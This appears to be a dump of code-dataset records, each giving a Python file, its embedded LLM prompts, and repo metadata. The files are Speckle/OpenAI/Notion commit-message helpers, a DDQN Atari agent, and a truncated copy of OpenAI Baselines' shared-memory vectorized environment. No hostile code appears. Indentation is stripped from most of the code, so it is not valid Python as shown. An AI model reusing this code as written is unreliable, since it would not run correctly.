for col in df.columns:
df[col] = pd.to_numeric(df[col], errors='coerce')
df[col].fillna(df_copy[col], inplace=True)
if return_original_df:
return df, df_copy
else:
return df
def updateStreamAnalysis(
client,
new_data,
stream_id,
branch_name,
geometryGroupPath=None,
match_by_id="",
openai_key ="",
return_original = False
):
"""
Updates Stream Analysis by modifying object attributes based on new data.
Args:
new_data (pandas.DataFrame): DataFrame containing new data.
stream_id (str): Stream ID.
branch_name (str): Branch name.
geometry_group_path (list, optional): Path to geometry group. Defaults to ["@Data", "@{0}"].
match_by_id (str, optional): key for column that should be used for matching. If empty, the index is used.
openai_key (str, optional): OpenAI key. If empty, no AI commit message is generated. Defaults to an empty string.
return_original (bool, optional): Determines whether to return original speckle stream objects. Defaults to False.
Returns:
list: original speckle stream objects as backup if return_original is set to True.
This function retrieves the latest commit from a specified branch, obtains the
necessary geometry objects, and matches new data with existing objects using
an ID mapper. The OpenAI GPT model is optionally used to create a commit summary
message. Changes are sent back to the server and a new commit is created, with
the original objects returned as a backup if return_original is set to True.
The script requires active server connection, necessary permissions, and relies
on Speckle and OpenAI's GPT model libraries.
"""
if geometryGroupPath == None:
geometryGroupPath = ["@Speckle", "Geometry"]
branch = client.branch.get(stream_id, branch_name, 2)
latest_commit = branch.commits.items[0]
commitID = latest_commit.id
commit = client.commit.get(stream_id, commitID)
# get objects
transport = ServerTransport(client=client, stream_id=stream_id)
#speckle stream
res = operations.receive(commit.referencedObject, transport)
# get geometry objects (they carry the attributes)
objects_raw = res[geometryGroupPath[0]][geometryGroupPath[1]]
res_new = copy.deepcopy(res)
# map ids
id_mapper = {}
if match_by_id != "":
for i, obj in enumerate(objects_raw):
id_mapper[obj[match_by_id]] = i
else:
for i, obj in enumerate(objects_raw):
id_mapper[str(i)] = i
# iterate through rows (objects)
for index, row in new_data.iterrows():
# determine target object
if match_by_id != "":
local_id = row[match_by_id]
else:
local_id = index
target_id = id_mapper[local_id]
#iterate through columns (attributes)
for col_name in new_data.columns:
res_new[geometryGroupPath[0]][geometryGroupPath[1]][target_id][col_name] = row[col_name]
# ======================== OPEN AI FUN ===========================
try:
answer_summary = gptCommitMessage(objects_raw, new_data,openai_key)
if answer_summary == None:
_, answer_summary = compareStats(get_dataframe(objects_raw),new_data)
except:
_, answer_summary = compareStats(get_dataframe(objects_raw),new_data)
# ================================================================
new_objects_raw_speckle_id = operations.send(base=res_new, transports=[transport])
# You can now create a commit on your stream with this object
commit_id = client.commit.create(
stream_id=stream_id,
branch_name=branch_name,
object_id=new_objects_raw_speckle_id,
message="Updated item in colab -" + answer_summary,
)
print("Commit created!")
if return_original:
return objects_raw #as back-up
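# Hypothetical call to updateStreamAnalysis; the stream id, branch name and dataframe are placeholders.
def _update_stream_example(client):
    new_data = pd.DataFrame({"ids": ["a1", "b2"], "walkability": [0.7, 0.4]})
    return updateStreamAnalysis(
        client,
        new_data,
        stream_id="your_stream_id",
        branch_name="analysis_results",
        match_by_id="ids",   # column used to match rows to speckle objects
        openai_key="",       # empty -> falls back to the plain stats summary commit message
    )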
def custom_describe(df):
# Convert columns to numeric if possible
df = df.apply(lambda x: pd.to_numeric(x, errors='ignore'))
# Initial describe with 'include = all'
desc = df.describe(include='all')
# Desired statistics
desired_stats = ['count', 'unique', 'mean', 'min', 'max']
# Filter for desired statistics
result = desc.loc[desired_stats, :].copy()
return result
def compareStats(df_before, df_after):
"""
Compares the descriptive statistics of two pandas DataFrames before and after some operations.
Args:
df_before (pd.DataFrame): DataFrame representing the state of data before operations.
df_after (pd.DataFrame): DataFrame representing the state of data after operations.
Returns:
The CSV string includes column name, intervention type, and before and after statistics for each column.
The summary string provides a count of updated and new columns.
This function compares the descriptive statistics of two DataFrames: 'df_before' and 'df_after'.
It checks the columns in both DataFrames and categorizes them as either 'updated' or 'new'.
The 'updated' columns exist in both DataFrames while the 'new' columns exist only in 'df_after'.
For 'updated' columns, it compares the statistics before and after and notes the differences.
For 'new' columns, it lists the 'after' statistics and marks the 'before' statistics as 'NA'.
The function provides a summary with the number of updated and new columns,
and a detailed account in CSV format of changes in column statistics.
"""
desc_before = custom_describe(df_before)
desc_after = custom_describe(df_after)
# Get union of all columns
all_columns = set(desc_before.columns).union(set(desc_after.columns))
# Track number of updated and new columns
updated_cols = 0
new_cols = 0
# Prepare DataFrame output
output_data = []
for column in all_columns:
row_data = {'column': column}
stat_diff = False # Track if there's a difference in stats for a column
# Check if column exists in both dataframes
if column in desc_before.columns and column in desc_after.columns:
updated_cols += 1
row_data['interventionType'] = 'updated'
for stat in desc_before.index:
before_val = round(desc_before.loc[stat, column], 1) if pd.api.types.is_number(desc_before.loc[stat, column]) else desc_before.loc[stat, column]
after_val = round(desc_after.loc[stat, column], 1) if pd.api.types.is_number(desc_after.loc[stat, column]) else desc_after.loc[stat, column]
if before_val != after_val:
stat_diff = True
row_data[stat+'_before'] = before_val
row_data[stat+'_after'] = after_val
elif column in desc_after.columns:
new_cols += 1
stat_diff = True
row_data['interventionType'] = 'new'
for stat in desc_after.index:
row_data[stat+'_before'] = 'NA'
after_val = round(desc_after.loc[stat, column], 1) if pd.api.types.is_number(desc_after.loc[stat, column]) else desc_after.loc[stat, column]
row_data[stat+'_after'] = after_val
# Only add to output_data if there's actually a difference in the descriptive stats between "before" and "after".
if stat_diff:
output_data.append(row_data)
output_df = pd.DataFrame(output_data)
csv_output = output_df.to_csv(index=False)
print (output_df)
# Add summary to beginning of output
summary = f"Summary:\n Number of updated columns: {updated_cols}\n Number of new columns: {new_cols}\n\n"
csv_output = summary + csv_output
return csv_output, summary
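# Tiny illustration of compareStats on made-up data (not called anywhere; for reference only).
def _compare_stats_example():
    before = pd.DataFrame({"use": ["office", "retail", "office"], "area": [10.0, 12.0, 11.0]})
    after = pd.DataFrame({"use": ["office", "retail", "housing"], "area": [10.0, 12.0, 15.0],
                          "score": [0.2, 0.5, 0.9]})
    csv_report, short_summary = compareStats(before, after)
    # csv_report lists "area"/"use" as updated and "score" as new; short_summary counts them.
    return short_summary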
# Function to call ChatGPT API
def ask_chatgpt(prompt, model="gpt-3.5-turbo", max_tokens=300, n=1, stop=None, temperature=0.3):
import openai
response = openai.ChatCompletion.create(
model=model,
messages=[
{"role": "system", "content": "You are a helpfull assistant,."},
{"role": "user", "content": prompt}
],
max_tokens=max_tokens,
n=n,
stop=stop,
temperature=temperature,
)
return response.choices[0].message['content']
def gptCommitMessage(objects_raw, new_data,openai_key):
# the idea is to automatically create commit messages. Commits coming through this channel are all
# about updating or adding a dataTable. So we can compare the descriptive stats of a before and after
# data frame
#try:
try:
import openai
openai.api_key = openai_key
except NameError as ne:
if str(ne) == "name 'openai' is not defined":
print("No auto commit message: openai module not imported. Please import the module before setting the API key.")
elif str(ne) == "name 'openai_key' is not defined":
print("No auto commit message: openai_key is not defined. Please define the variable before setting the API key.")
else:
raise ne
report, summary = compareStats(get_dataframe(objects_raw),new_data)
# prompt
prompt = f"""Given the following changes in my tabular data structure, generate a
precise and informative commit message. The changes involve updating or adding
attribute keys and values. The provided summary statistics detail the changes in
the data from 'before' to 'after'.
The CSV format below demonstrates the structure of the summary:
Summary:
Number of updated columns: 2
Number of new columns: 1
column,interventionType,count_before,count_after,unique_before,unique_after,mean_before,mean_after,min_before,min_after,max_before,max_after
A,updated,800,800,2,3,,nan,nan,nan,nan,nan
B,updated,800,800,3,3,,nan,nan,nan,nan,nan
C,new,NA,800,NA,4,NA,nan,NA,nan,NA,nan
For the commit message, your focus should be on changes in the data structure, not the interpretation of the content. Be precise, state the facts, and highlight significant differences or trends in the statistics, such as shifts in mean values or an increase in unique entries.
Based on the above guidance, draft a commit message using the following actual summary statistics:
{report}
Your commit message should follow this structure:
1. Brief description of the overall changes.
2. Significant changes in summary statistics (count, unique, mean, min, max).
3. Conclusion, summarizing the most important findings with the strucutre:
# changed columns: , comment: ,
# added Columns: , comment: ,
# Chaged statistic: , coment: ,
Mark the beginning of the conclusion with ">>>" and ensure to emphasize hard facts and significant findings.
"""
try:
    answer = ask_chatgpt(prompt)
    if answer is None:
        answer_summary = summary
    else:
        answer_summary = answer.split(">>>")[1]
except:
    answer_summary = summary
return answer_summary
def specklePolyline_to_BokehPatches(speckle_objs, pth_to_geo="curves", id_key="ids"):
"""
Takes a list of speckle objects, extracts the polyline geometry at the specified path, and returns a dataframe of x and y coordinates for each polyline.
This format is compatible with the Bokeh Patches object for plotting.
Args:
speckle_objs (list): A list of Speckle Objects
pth_to_geo (str): Path to the geometry in the Speckle Object
id_key (str): The key to use for the object id column in the dataframe. Defaults to "ids"
Returns:
pd.DataFrame: A Pandas DataFrame with columns "uuid", "patches_x" and "patches_y"
"""
patchesDict = {"uuid":[], "patches_x":[], "patches_y":[]}
for obj in speckle_objs:
obj_geo = obj[pth_to_geo]
obj_pts = Polyline.as_points(obj_geo)
coorX = []
coorY = []
for pt in obj_pts:
coorX.append(pt.x)
coorY.append(pt.y)
patchesDict["patches_x"].append(coorX)
patchesDict["patches_y"].append(coorY)
patchesDict["uuid"].append(obj[id_key])
return pd.DataFrame(patchesDict)
def rebuildAnalysisInfoDict(analysisInfo):
"""rebuild the analysisInfo dictionary to remove the ++ from the keys
Args:
analysisInfo (list): a list containing the analysisInfo dictionary
Returns:
dict: a dictionary containing the analysisInfo dictionary with keys without the ++
"""
analysisInfoDict = {}
for curKey in analysisInfo[0]:
newkey = curKey.split("++")[0]
analysisInfoDict[newkey] = analysisInfo[0][curKey]
return analysisInfoDict
def specklePolyline2Patches(speckle_objs, pth_to_geo="curves", id_key=None):
"""
Converts Speckle objects' polyline information into a format suitable for Bokeh patches.
Args:
speckle_objs (list): A list of Speckle objects.
pth_to_geo (str, optional): The path to the polyline geometric information in the Speckle objects. Defaults to "curves".
id_key (str, optional): The key for object identification. Defaults to None (no id column is added).
Returns:
DataFrame: A pandas DataFrame with three columns - "uuid", "patches_x", and "patches_y". Each row corresponds to a Speckle object.
"uuid" column contains the object's identifier.
"patches_x" and "patches_y" columns contain lists of x and y coordinates of the polyline points respectively.
This function iterates over the given Speckle objects, retrieves the polyline geometric information and the object's id from each Speckle object,
and formats this information into a format suitable for Bokeh or matplotlib patches. The formatted information is stored in a dictionary with three lists
corresponding to the "uuid", "patches_x", and "patches_y", and this dictionary is then converted into a pandas DataFrame.
"""
patchesDict = {"patches_x":[], "patches_y":[]}
if id_key != None:
patchesDict[id_key] = []
for obj in speckle_objs:
obj_geo = obj[pth_to_geo]
coorX = []
coorY = []
if isinstance(obj_geo, Mesh):
# For meshes, we'll just use the vertices for now
for pt in obj_geo.vertices:
coorX.append(pt.x)
coorY.append(pt.y)
else:
# For polylines, we'll use the existing logic
obj_pts = Polyline.as_points(obj_geo)
for pt in obj_pts:
coorX.append(pt.x)
coorY.append(pt.y)
patchesDict["patches_x"].append(coorX)
patchesDict["patches_y"].append(coorY)
if id_key != None:
patchesDict[id_key].append(obj[id_key])
return pd.DataFrame(patchesDict)
#================= NOTION INTEGRATION ============================
headers = {
"Notion-Version": "2022-06-28",
"Content-Type": "application/json"
}
def get_page_id(token, database_id, name):
headers['Authorization'] = "Bearer " + token
# Send a POST request to the Notion API
response = requests.post(f"https://api.notion.com/v1/databases/{database_id}/query", headers=headers)
# Load the response data
data = json.loads(response.text)
# Check each page in the results
for page in data['results']:
# If the name matches, return the ID
if page['properties']['name']['title'][0]['text']['content'] == name:
return page['id']
# If no match was found, return None
return None
def add_or_update_page(token, database_id, name, type, time_updated, comment, speckle_link):
# Format time_updated as a string 'YYYY-MM-DD'
date_string = time_updated.strftime('%Y-%m-%d')
# Construct the data payload
data = {
'parent': {'database_id': database_id},
'properties': {
'name': {'title': [{'text': {'content': name}}]},
'type': {'rich_text': [{'text': {'content': type}}]},
'time_updated': {'date': {'start': date_string}},
'comment': {'rich_text': [{'text': {'content': comment}}]},
'speckle_link': {'rich_text': [{'text': {'content': speckle_link}}]}
}
}
# Check if a page with this name already exists
page_id = get_page_id(token, database_id, name)
headers['Authorization'] = "Bearer " + token
if page_id:
# If the page exists, send a PATCH request to update it
response = requests.patch(f"https://api.notion.com/v1/pages/{page_id}", headers=headers, data=json.dumps(data))
else:
# If the page doesn't exist, send a POST request to create it
response = requests.post("https://api.notion.com/v1/pages", headers=headers, data=json.dumps(data))
print(response.text)
# Use the function
#add_or_update_page('your_token', 'your_database_id', 'New Title', 'New Type', datetime.now(), 'This is a comment', 'https://your-link.com')
| [
"<class 'type'>",
"Given the following changes in my tabular data structure, generate a \n precise and informative commit message. The changes involve updating or adding \n attribute keys and values. The provided summary statistics detail the changes in \n the data from 'before' to 'after'. \n The CSV format below demonstrates the structure of the summary:\n\n Summary:\n Number of updated columns: 2\n Number of new columns: 1\n column,interventionType,count_before,count_after,unique_before,unique_after,mean_before,mean_after,min_before,min_after,max_before,max_after\n A,updated,800,800,2,3,,nan,nan,nan,nan,nan\n B,updated,800,800,3,3,,nan,nan,nan,nan,nan\n C,new,NA,800,NA,4,NA,nan,NA,nan,NA,nan\n\n For the commit message, your focus should be on changes in the data structure, not the interpretation of the content. Be precise, state the facts, and highlight significant differences or trends in the statistics, such as shifts in mean values or an increase in unique entries.\n\n Based on the above guidance, draft a commit message using the following actual summary statistics:\n\n PLACEHOLDER\n\n Your commit message should follow this structure:\n\n 1. Brief description of the overall changes.\n 2. Significant changes in summary statistics (count, unique, mean, min, max).\n 3. Conclusion, summarizing the most important findings with the strucutre:\n # changed columns: , comment: ,\n # added Columns: , comment: ,\n # Chaged statistic: , coment: ,\n\n Mark the beginning of the conclusion with \">>>\" and ensure to emphasize hard facts and significant findings. \n ",
"You are a helpfull assistant,."
] |
2024-01-10 | tzutengweng33176/ADL_2019 | A3~agent_dir~agent_ddqn.py | import random
import math
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
import torch.nn as nn
from collections import namedtuple
import matplotlib.pyplot as plt
from agent_dir.agent import Agent
from environment import Environment
import pickle
use_cuda = torch.cuda.is_available()
Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
#experience replay
#break correlations in data, bring us back to iid setting
#Learn from all past policies
class ReplayMemory(object):
def __init__(self, capacity):
self.capacity = capacity
self.memory=[]
self.position= 0
def push(self, *args):
'''
Save a transition
'''
if len(self.memory) < self.capacity:
self.memory.append(None) #append a None or index will go out of range
#print(*args)
#https://www.saltycrane.com/blog/2008/01/how-to-use-args-and-kwargs-in-python/
#input()
self.memory[self.position]= Transition(*args)
self.position= (self.position+1)% self.capacity
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self): #https://blog.csdn.net/u013061183/article/details/74773196
return len(self.memory)
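# Small self-contained check of the replay buffer with dummy tensors (illustrative; not used in training).
def _replay_memory_example():
    buffer = ReplayMemory(capacity=100)
    for i in range(5):
        state = torch.zeros(1, 4, 84, 84)
        action = torch.tensor([[i % 7]])
        next_state = None if i == 4 else torch.zeros(1, 4, 84, 84)  # None marks a terminal step
        reward = torch.tensor([1.0])
        buffer.push(state, action, next_state, reward)
    batch = buffer.sample(3)            # list of 3 Transition namedtuples
    return Transition(*zip(*batch))     # same transpose trick used later in AgentDQN.update()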
class DQN(nn.Module): #this is the critic, the value function; Q-networks represent value functions with weights w
'''
This architecture is the one from OpenAI Baseline, with small modification.
'''
def __init__(self, channels, num_actions):
super(DQN, self).__init__()
self.conv1 = nn.Conv2d(channels, 32, kernel_size=8, stride=4)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
self.fc = nn.Linear(3136, 512)
self.head = nn.Linear(512, num_actions)
self.relu = nn.ReLU()
self.lrelu = nn.LeakyReLU(0.01)
#DQN will compute the expected return of taking each action(total 7 actions) given the current state
def forward(self, x):
x = self.relu(self.conv1(x))
x = self.relu(self.conv2(x))
x = self.relu(self.conv3(x))
x = self.lrelu(self.fc(x.view(x.size(0), -1)))
q = self.head(x)
return q
class AgentDQN(Agent):
def __init__(self, env, args):
self.env = env
self.input_channels = 4 # input channels = the 4 most recent stacked frames
self.num_actions = self.env.action_space.n # 7 actions
# TODO:
# Initialize your replay buffer
self.memory = ReplayMemory(10000)
# build target, online network
self.target_net = DQN(self.input_channels, self.num_actions)
self.target_net = self.target_net.cuda() if use_cuda else self.target_net
self.online_net = DQN(self.input_channels, self.num_actions)
self.online_net = self.online_net.cuda() if use_cuda else self.online_net
if args.test_dqn:
self.load('dqn')
# discounted reward
self.GAMMA = 0.99
# training hyperparameters
self.train_freq = 4 # frequency to train the online network
self.learning_start = 10000 # before we start to update our network, we wait a few steps first to fill the replay.
self.batch_size = 32
self.num_timesteps = 300000 # total training steps -->you can change it to 1000000 in report Q2
self.display_freq = 10 # frequency to display training progress
self.save_freq = 200000 # frequency to save the model
self.target_update_freq = 1000 # frequency to update target network
#epsilon greedy policy hyperparameters
self.eps_start = 0.9
self.eps_end = 0.05
self.eps_decay= 200
# optimizer
self.optimizer = optim.RMSprop(self.online_net.parameters(), lr=1e-4)
#fix the target net, update the parameters in the online_net
#freeze target Q network to avoid oscillation
self.steps = 0 # num. of passed steps. this may be useful in controlling exploration
self.device= torch.device("cuda" if use_cuda else "cpu")
def save(self, save_path):
print('save model to', save_path)
torch.save(self.online_net.state_dict(), save_path + '_online.cpt')
torch.save(self.target_net.state_dict(), save_path + '_target.cpt')
def load(self, load_path):
print('load model from', load_path)
if use_cuda:
self.online_net.load_state_dict(torch.load(load_path + '_online.cpt'))
self.target_net.load_state_dict(torch.load(load_path + '_target.cpt'))
else:
self.online_net.load_state_dict(torch.load(load_path + '_online.cpt', map_location=lambda storage, loc: storage))
self.target_net.load_state_dict(torch.load(load_path + '_target.cpt', map_location=lambda storage, loc: storage))
def init_game_setting(self):
# we don't need init_game_setting in DQN
pass
def make_action(self, state, test=False):
# TODO:
if not test:
# At first, you decide whether you want to explore the environemnt
sample= random.random()
#implementation of epsilon greedy exploration algorithms
eps_threshold = self.eps_end +(self.eps_start-self.eps_end)*math.exp(-1*self.steps/self.eps_decay)
#self.steps +=1 #see def train(), already in there
# TODO:
# if explore, you randomly samples one action
# else, use your model to predict action
if sample > eps_threshold: #no explore
with torch.no_grad():
#print(self.online_net(state))
#print(self.online_net(state).shape) #torch.Size([1, 7])
#print(self.online_net(state).max(1)) #(tensor([0.0511], device='cuda:0'), tensor([6], device='cuda:0'))
#print(self.online_net(state).max(1)[1].view(1, 1)) #tensor([[4]], device='cuda:0')
action= self.online_net(state).max(1)[1].view(1, 1) #policy function is right here
#pi'(s) = argmax(a) Q(s, a)
#the policy function does not have extra parameters, it depends on the value function
#not suitable for continuous action
else: #if explore
#about exploration:https://www.youtube.com/watch?v=3htlYl4Whr8&t=2006s 55:18
action=torch.tensor([[random.randrange(self.num_actions)]], device= self.device, dtype= torch.long)
else:
#print(state)
#print(state.shape) #(84, 84, 4)
state = torch.from_numpy(state).permute(2,0,1).unsqueeze(0)
#(84, 84, 4) -->torch.size([1 ,4, 84, 84])
state = state.cuda() if use_cuda else state
action= self.online_net(state).max(1)[1].item()
#print(action)
return action
def update(self):
# TODO:
# To update model, we sample some stored experiences as training examples.
if len(self.memory) < self.batch_size:
return
transitions= self.memory.sample(self.batch_size)
#print(self.num_actions)
#input()
#print(len(transitions)) #a list of transitions, len = batch_size
#input()
# TODO:
# Compute Q(s_t, a) with your model.
#print(zip(*transitions)) #<zip object at 0x7f5d6b1b4788>
#print(*zip(*transitions)) #dereference the zip object
batch= Transition(*zip(*transitions))
non_final_mask =torch.tensor(tuple(map(lambda s: s is not None, batch.next_state)), dtype=torch.uint8)
#if we are at the final state, next_state will be None!!! So be careful.
#print(non_final_mask) #tensor([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
#1, 1, 1, 1, 1, 1, 1, 1], dtype=torch.uint8)
#python map function: http://www.runoob.com/python/python-func-map.html
non_final_next_states = torch.cat([s for s in batch.next_state
if s is not None])
#print(len(batch.state)) #batch.state is a tuple #batch_size
state_batch = torch.cat(batch.state)
#print(state_batch.shape) # batch_size, 4, 84, 84
action_batch = torch.cat(batch.action)
#print(action_batch.shape) #batch_size, 1
#print(action_batch)
reward_batch = torch.cat(batch.reward)
#print(reward_batch.shape) #batch_size
#print(batch)
#print(self.online_net(state_batch).shape) #batch_size, num_of_action
state_action_values = self.online_net(state_batch).gather(1, action_batch)
#
#print(state_action_values.shape) #torch.Size([32, 1])
#input()
with torch.no_grad():
#print("HAHA")
# TODO:
# Compute Q(s_{t+1}, a) for all next states.
# Since we do not want to backprop through the expected action values,
# use torch.no_grad() to stop the gradient from Q(s_{t+1}, a)
next_state_values= torch.zeros(self.batch_size, device= self.device)
#print(self.target_net(non_final_next_states))
#print(self.target_net(non_final_next_states).shape) #torch.Size([32, 7]) #batch_size, num_of_actions
#each sample has 7 values corresponding to 7 actions, given the next_state
#print(self.target_net(non_final_next_states).max(1))
#print(self.target_net(non_final_next_states).max(1)[0].shape) #torch.Size([32])
#print(self.target_net(non_final_next_states).max(1)[0].detach()) #Returns a new Tensor, detached from the current graph.
#If keepdim is True, the output tensors are of the same size as input except in the dimension dim where they are of size 1. Otherwise, dim is squeezed (see torch.squeeze()), resulting in the output tensors having 1 fewer dimension than input.
#print(next_state_actions)
#print(next_state_actions.shape) #torch.Size([32, 1])
#print(self.target_net(non_final_next_states).gather(1, next_state_actions).shape) #torch.Size([32, 1])
next_state_actions =self.online_net(non_final_next_states).max(1)[1].unsqueeze(1) #argmax(a') Q(s', a', w)
next_state_values[non_final_mask]= self.target_net(non_final_next_states).gather(1, next_state_actions).squeeze().detach()
#you must detach() or the performance will drop
#input()
# TODO:
# Compute the expected Q values: rewards + gamma * max(Q(s_{t+1}, a))
# You should carefully deal with gamma * max(Q(s_{t+1}, a)) when it is the terminal state.
expected_state_action_values = (self.GAMMA*next_state_values) +reward_batch
#expected_state_action_values is the learning target!!!
#value functions decompose into a Bellman equation
#print(expected_state_action_values)
#print(expected_state_action_values.shape) #torch.Size([32]) batch_size
#whole process: https://www.youtube.com/watch?v=3htlYl4Whr8&t=2006s 53:41
# TODO:
# Compute temporal difference loss -->HOW????
#update value toward estimated return
#https://www.youtube.com/watch?v=3htlYl4Whr8 31:00
#in pytorch tutorial, they use Huber loss, you can try that later
#https://www.youtube.com/watch?v=3htlYl4Whr8&t=2006s 41:18 MSE loss
#mse_loss= nn.MSELoss()
#loss= mse_loss(state_action_values,expected_state_action_values.unsqueeze(1))
loss= F.smooth_l1_loss(state_action_values,expected_state_action_values.unsqueeze(1))
#print(loss)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
#print(loss)
#input()
return loss.item()
def train(self):
episodes_done_num = 0 # passed episodes
total_reward = 0 # compute average reward
loss = 0
x=[]
y=[]
while(True):
state = self.env.reset()
# State: (80,80,4) --> (1,4,80,80)
state = torch.from_numpy(state).permute(2,0,1).unsqueeze(0)
state = state.cuda() if use_cuda else state
done = False
while(not done):
# select and perform action
action = self.make_action(state)
next_state, reward, done, _ = self.env.step(action[0, 0].data.item())
#print(next_state)
#print(reward)
#input()
total_reward += reward
reward= torch.tensor([reward], device= self.device) #NOT so sure
# process new state
next_state = torch.from_numpy(next_state).permute(2,0,1).unsqueeze(0)
next_state = next_state.cuda() if use_cuda else next_state
if done:
next_state = None
# TODO:
# store the transition in memory
self.memory.push(state, action, next_state, reward)
# move to the next state
state = next_state
# Perform one step of the optimization
if self.steps > self.learning_start and self.steps % self.train_freq == 0:
loss = self.update()
# update target network
if self.steps > self.learning_start and self.steps % self.target_update_freq == 0:
self.target_net.load_state_dict(self.online_net.state_dict())
# save the model
if self.steps % self.save_freq == 0:
self.save('dqn')
self.steps += 1
if episodes_done_num % self.display_freq == 0:
x.append(self.steps)
y.append(total_reward / self.display_freq) #avg reward in last 10 episodes
print('Episode: %d | Steps: %d/%d | Avg reward: %f | loss: %f '%
(episodes_done_num, self.steps, self.num_timesteps, total_reward / self.display_freq, loss))
total_reward = 0
#plt.plot(x, y)
#plt.xlabel('Timesteps')
#plt.ylabel('Avg reward in last 10 episodes')
#plt.show()
#plt.savefig('dqn_baseline.png')
episodes_done_num += 1
if self.steps > self.num_timesteps:
break
self.save('dqn')
pickle_out_x = open('ddqn_x_0.99.pkl', 'wb')
pickle_out_y = open('ddqn_y_0.99.pkl', 'wb')
pickle.dump(x, pickle_out_x)
pickle.dump(y, pickle_out_y)
pickle_out_x.close()
pickle_out_y.close()
| [] |
2024-01-10 | tzutengweng33176/ADL_2019 | A3~a2c~vec_env~shmem_vec_env.py | """
An interface for asynchronous vectorized environments.
Modify from OpenAI Baseline
Reference: https://raw.githubusercontent.com/openai/baselines/master/baselines/common/vec_env/shmem_vec_env.py
"""
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
import ctypes
from .util import dict_to_obs, obs_space_info, obs_to_dict
_NP_TO_CT = {np.float32: ctypes.c_float,
np.int32: ctypes.c_int32,
np.int8: ctypes.c_int8,
np.uint8: ctypes.c_char,
np.bool: ctypes.c_bool}
class ShmemVecEnv(VecEnv):
"""
Optimized version of SubprocVecEnv that uses shared variables to communicate observations.
"""
def __init__(self, env_fns, spaces=None, context='spawn'):
"""
If you don't specify observation_space, we'll have to create a dummy
environment to get it.
"""
ctx = mp.get_context(context)
if spaces:
observation_space, action_space = spaces
else:
dummy = env_fns[0]()
observation_space, action_space = dummy.observation_space, dummy.action_space
dummy.close()
del dummy
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
self.obs_keys, self.obs_shapes, self.obs_dtypes = obs_space_info(observation_space)
self.obs_bufs = [
{k: ctx.Array(_NP_TO_CT[self.obs_dtypes[k].type], int(np.prod(self.obs_shapes[k]))) for k in self.obs_keys}
for _ in env_fns]
self.parent_pipes = []
self.procs = []
with clear_mpi_env_vars():
for env_fn, obs_buf in zip(env_fns, self.obs_bufs):
wrapped_fn = CloudpickleWrapper(env_fn)
parent_pipe, child_pipe = ctx.Pipe()
proc = ctx.Process(target=_subproc_worker,
args=(child_pipe, parent_pipe, wrapped_fn, obs_buf, self.obs_shapes, self.obs_dtypes, self.obs_keys))
proc.daemon = True
self.procs.append(proc)
self.parent_pipes.append(parent_pipe)
proc.start()
child_pipe.close()
self.waiting_step = False
self.viewer = None
def reset(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('reset', None))
return self._decode_obses([pipe.recv() for pipe in self.parent_pipes])
def step_async(self, actions):
assert len(actions) == len(self.parent_pipes)
for pipe, act in zip(self.parent_pipes, actions):
pipe.send(('step', act))
def step_wait(self):
outs = [pipe.recv() for pipe in self.parent_pipes]
obs, rews, dones, infos = zip(*outs)
return self._decode_obses(obs), np.array(rews), np.array(dones), infos
def close_extras(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('close', None))
for pipe in self.parent_pipes:
pipe.recv()
pipe.close()
for proc in self.procs:
proc.join()
def get_images(self, mode='human'):
for pipe in self.parent_pipes:
pipe.send(('render', None))
return [pipe.recv() for pipe in self.parent_pipes]
def _decode_obses(self, obs):
result = {}
for k in self.obs_keys:
bufs = [b[k] for b in self.obs_bufs]
o = [np.frombuffer(b.get_obj(), dtype=self.obs_dtypes[k]).reshape(self.obs_shapes[k]) for b in bufs]
result[k] = np.array(o)
return dict_to_obs(result)
def _subproc_worker(pipe, parent_pipe, env_fn_wrapper, obs_bufs, obs_shapes, obs_dtypes, keys):
"""
Control a single environment instance using IPC and
shared memory.
"""
def _write_obs(maybe_dict_obs):
flatdict = obs_to_dict(maybe_dict_obs)
for k in keys:
dst = obs_bufs[k].get_obj()
dst_np = np.frombuffer(dst, dtype=obs_dtypes[k]).reshape(obs_shapes[k]) # pylint: disable=W0212
np.copyto(dst_np, flatdict[k])
env = env_fn_wrapper.x()
parent_pipe.close()
try:
while True:
cmd, data = pipe.recv()
if cmd == 'reset':
pipe.send(_write_obs(env.reset()))
elif cmd == 'step':
obs, reward, done, info = env.step(data)
if done:
obs = env.reset()
pipe.send((_write_obs(obs), reward, done, info))
elif cmd == 'render':
pipe.send(env.render(mode='rgb_array'))
elif cmd == 'close':
pipe.send(None)
break
else:
raise RuntimeError('Got unrecognized cmd %s' % cmd)
except KeyboardInterrupt:
print('ShmemVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
| [] |
2024-01-10 | tzutengweng33176/ADL_2019 | A3~r07922118~a2c~vec_env~shmem_vec_env.py | """
An interface for asynchronous vectorized environments.
Modify from OpenAI Baseline
Reference: https://raw.githubusercontent.com/openai/baselines/master/baselines/common/vec_env/shmem_vec_env.py
"""
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
import ctypes
from .util import dict_to_obs, obs_space_info, obs_to_dict
_NP_TO_CT = {np.float32: ctypes.c_float,
np.int32: ctypes.c_int32,
np.int8: ctypes.c_int8,
np.uint8: ctypes.c_char,
np.bool: ctypes.c_bool}
class ShmemVecEnv(VecEnv):
"""
Optimized version of SubprocVecEnv that uses shared variables to communicate observations.
"""
def __init__(self, env_fns, spaces=None, context='spawn'):
"""
If you don't specify observation_space, we'll have to create a dummy
environment to get it.
"""
ctx = mp.get_context(context)
if spaces:
observation_space, action_space = spaces
else:
dummy = env_fns[0]()
observation_space, action_space = dummy.observation_space, dummy.action_space
dummy.close()
del dummy
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
self.obs_keys, self.obs_shapes, self.obs_dtypes = obs_space_info(observation_space)
self.obs_bufs = [
{k: ctx.Array(_NP_TO_CT[self.obs_dtypes[k].type], int(np.prod(self.obs_shapes[k]))) for k in self.obs_keys}
for _ in env_fns]
self.parent_pipes = []
self.procs = []
